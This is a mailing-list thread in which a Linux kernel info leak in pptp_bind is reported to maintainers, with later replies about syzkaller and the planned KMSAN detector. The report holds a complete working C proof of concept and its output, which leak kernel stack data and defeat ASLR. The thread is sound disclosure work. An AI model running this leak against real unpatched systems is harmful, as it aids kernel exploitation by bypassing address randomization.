Information leak in pptp_bind

85 views
Skip to first unread message

Dmitry Vyukov

unread,
Dec 14, 2015, 5:38:48 AM12/14/15
to Dmitry Kozlov, net...@vger.kernel.org, LKML, syzk...@googlegroups.com, Kostya Serebryany, Alexander Potapenko, Dmitry Vyukov, edum...@google.com, Sasha Levin, kees...@google.com, j...@google.com
Hello,

The following program leak various uninit garbage including kernel
addresses and whatever is on kernel stack, in particular defeating
ASLR. The issue is in pptp_bind which does not verify sockaddr_len

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/in6.h>
#include <linux/socket.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
struct sockaddr sa;
unsigned len, i, try;
int fd;

for (try = 0; try < 5; try++) {
fd = socket(AF_PPPOX, SOCK_RAW, PX_PROTO_PPTP);
if (fd == -1)
return;
memset(&sa, 0, sizeof(sa));
bind(fd, &sa, 0);
len = sizeof(sa);
getsockname(fd, &sa, &len);
for (i = 0; i < len; i++)
printf("%02x", ((unsigned char*)&sa)[i]);
printf("\n");
}
return 0;
}

# ./a.out
1800020000004700c012833d00880000b002400000000000005eddc66d2b
1800020000004800408bf13a00880000b002400000000000005eddc66d2b
180002000000490080a5f13a00880000b002400000000000005eddc66d2b
1800020000004a00008ff13a00880000b002400000000000005eddc66d2b
1800020000004b008096f13a00880000b002400000000000005eddc66d2b

Hannes Frederic Sowa

unread,
Dec 14, 2015, 5:45:01 PM12/14/15
to Dmitry Vyukov, Dmitry Kozlov, net...@vger.kernel.org, LKML, syzk...@googlegroups.com, Kostya Serebryany, Alexander Potapenko, Dmitry Vyukov, edum...@google.com, Sasha Levin, kees...@google.com, j...@google.com
On 14.12.2015 11:38, Dmitry Vyukov wrote:
> The following program leak various uninit garbage including kernel
> addresses and whatever is on kernel stack, in particular defeating
> ASLR. The issue is in pptp_bind which does not verify sockaddr_len.

Thanks for the report!

I send out a patch soon.


Wei You

unread,
Apr 14, 2017, 3:02:26 PM4/14/17
to syzkaller
Hi, Dmitry,

I am very curious about how to use syzkaller to find "information leak" bugs.
We know that for memory related bugs, syzkaller leverages KASAN to find illegal memory access.
But how syzkaller monitor the bugs that leak information?
Thanks.

Dmitry Vyukov

unread,
Apr 18, 2017, 5:27:50 AM4/18/17
to Wei You, syzkaller, Alexander Potapenko
Hi Wei,

I don't remember exactly, but I think I was just looking at source
code around some other bug found by syzkaller. Currently there are no
good means for detecting uses of uninit memory. You can try KMEMCHECK,
but my understanding is that it does not quite work.
We are currently working on KMSAN (kernel analog of user-space MSAN
https://github.com/google/sanitizers/wiki/MemorySanitizer). It will
provide precise, prompt detection of such cases. A work-in-progress
version of KMSAN should be open-sources within next weeks or so.
> --
> You received this message because you are subscribed to the Google Groups
> "syzkaller" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to syzkaller+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.

Wei You

unread,
Apr 19, 2017, 9:45:39 AM4/19/17
to syzkaller
Hi  Dmitry,

Thanks for your reply.
When KMSAN is available for open-source, will it be integrated into the latest linux kernel? 

Bests,
Wei

Dmitry Vyukov

unread,
Apr 19, 2017, 10:18:02 AM4/19/17
to Wei You, syzkaller
On Wed, Apr 19, 2017 at 3:45 PM, Wei You <weiyo...@gmail.com> wrote:
> Hi Dmitry,
>
> Thanks for your reply.
> When KMSAN is available for open-source, will it be integrated into the
> latest linux kernel?

I hope so. But such things don't happen in a day.
Reply all
Reply to author
Forward
0 new messages